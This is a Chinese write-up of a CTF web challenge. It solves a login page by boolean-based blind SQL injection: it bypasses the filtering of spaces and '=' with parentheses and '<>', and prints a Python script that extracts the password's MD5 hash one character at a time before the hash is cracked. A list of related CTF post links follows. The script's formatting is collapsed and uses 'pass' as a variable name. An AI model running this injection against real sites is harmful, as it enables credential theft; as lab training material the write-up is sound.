ctf-web-sql注入
题目链接:跳转提示
打开网页,一个登陆页面,根据题是本题题型是基于布尔的SQL盲注
首先在用户名处输入admin
得到结果:
即密码确为admin,而如果不输入用户名直接输入密码,发现报错
可见后台是先判断用户名是否正确存在,当用户名正确后再判断密码是否正确。
经测试发现,当出现'空格符','=','and'等字符时,发现会报错显示:‘illegal character’,即知道这些字符会被过滤,可以用括号来避免空格符的使用,用<>(大于或小于)来避免'='的使用
尝试输入:ad'or(ascii(substr((password)from(1)))<>97)#
只有当ascii(substr((password)from(1)))==97时,整个句式username=='ad'or(ascii(substr((password)from(1)))<>97)为假,
即预计只有当显示结果为username does not exist!时,ascii(substr((password)from(1)))<>97为假,可以用此方法判断password的内容
得到结果:
发现句式可用,因为ad不是用户名,结果却显示密码错误,没有显示用户名错误,根据or的特性,说明后半段的语句为真,即password的第一个字符<>97
利用脚本:
import requests
ra=requests.session()
pass=""
for j in range(1,100):flag=0for i in range(48,123):test="admin1'or(ascii(substr((password)from("+str(j)+")))<>"+str(i)+")#"url='http://114.67.175.224:18554/'data={'username':test,'password':""}pa=ra.post(url=url,data=data).textif "username does not exist!" in pa:pass+=chr(i)flag=ibreakif flag==123:break
print(pass)
得到password=4dcc88f8f1bc05e7c2ad1a60288481a2
发现密码错误,因为这串字符符合md5摘要格式(32个字符,只包含0~9,a~f字符)
md5解码果然得到:bugkuctf
输入用户名:admin 密码:bugkuctf 得到flag
(PS:这道题还没开始注入就把密码试出来了,这密码太简单了)
ctf-web-sql注入相关推荐
- CG CTF WEB SQL注入2
http://4.chinalover.sinaapp.com/web6/index.php 题解: <html> <head> Secure Web Login II < ...
- CG CTF WEB SQL注入1
http://chinalover.sinaapp.com/index.php 题解: <html> <head> Secure Web Login </head> ...
- CTF系列之Web——SQL注入
前言 在刚学习SQL注入的过程中非常艰难,查资料的时间有一周这么长,点开的网页也不下一千,认真读的也最少有两百,可是能引导入门的真的没几篇,都是复制来复制去的,没意思,感觉就是在浪费时间.有很多知识点 ...
- CTF中SQL注入常见题型整理
前言 SQL在CTF每一次比赛中基本上都会出现,所以有了这一篇总结,防忘. 简而言之:SQL注入用户输入的数据变成了代码被执行. 这一篇这要写的是sql注入中各种经典类型的案例.暂时只写这么一点,后面 ...
- ctf php sql注入,【CTF-Web Learning 1】0x01 SQL注入之宽字节注入
0x01 前言 准备系统梳理和总结提高这一年所学的关于Web方面东西,如有问题欢迎指点. 在计算机中,字符的表示与存储都离不开编码.例如ASCII,utf-8,gbk2312等.通常字符的表示都只需1 ...
- Web—SQL注入攻击
文章目录 一.mysql常用语句 二.SQL注入概念 1. 产生原因 2. 攻击分类 三.攻击流程 1. 常用检测语句如何识别SQL注入 2. Mysql注入常用函数 3. 查询数据的核心语法 4. ...
- CG CTF WEB SQL Injection
http://chinalover.sinaapp.com/web15/index.php 题解: <!-- #GOAL: login as admin,then get the flag; e ...
- ctf php sql注入,CTF—攻防练习之HTTP—SQL注入(SSI注入)
主机:192.168.32.152 靶机:192.168.32.161 ssI是赋予html静态页面的动态效果,通过ssi执行命令,返回对应的结果,若在网站目录中发现了.stm .shtm .shtm ...
- CTFHub闯关之SQL注入
CTF(Capture The Flag)中文一般译作夺旗赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式.CTF起源于1996年DEFCON全球黑客大会,以代替之前黑客们通过 ...
- [网络安全提高篇] 一〇九.津门杯CTF的Web Write-Up万字详解(SSRF、文件上传、SQL注入、代码审计、中国蚁剑)
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步.这篇文章主要介绍5月9日参加津门杯CTF题目知识,包括power_cut.hate_ ...
最新文章
- OpenAI 发布通用人工智能研究纲领:以全人类的名义承诺
- 高级C语言教程编码风格
- 开放下载!《iOS开发者必读资讯》
- 使用原生js写ajax
- 模拟服务器和客户端交互的python脚本
- html5留言板网页设计,网页设计制作-留言板
- 重装系统后管家婆数据库丢失,数据库碎片扫描、提取、重组数据恢复
- 如何在电脑上下载抖音视频
- 【C补充】指向指针或函数的指针
- shopex mysql索引_shopex数据库表结构说明文档.doc
- Windows下智能卡开发
- 如果已经安装过个人版Delphi2007,如何安装Delphi2007企业版
- python中np.array的shape(2,)与shape(1 ,2)的运算细节
- C++基础面试问题总结
- onenote的笔记本在windows10保存的路径
- Java文件操作大全(包括文件加密,String加密)
- 解决聊天页下拉加载历史记录,新获取的历史记录把刚看的信息挤下去的问题
- 如何下载视频网站中video标签中的视频资源以blob:http开头的地址的资源
- Redis的哨兵模式搭建
- MySQL图形管理软件安装及使用
热门文章
- ceisum加载shp格式的城市白模建筑数据
- python 百度翻译官方api和破解版方法
- 微信小程序 java高校科研管理系统
- java实现人脸识别源码【含测试效果图】——前期准备工作及访问提示
- 大一高等数学期末考试试卷及答案详解
- 关于Shell脚本执行python代码,出现No such file or directorython: can't open file的问题
- 关于SQLserve安装中出现“启用windows功能NetFx3时出错“
- Intouch2020安装与授权
- c语言成绩管理系统1.0,c语言成绩管理系统完整附源码v1.0 免费版
- Android教程 - - adb工具包的安装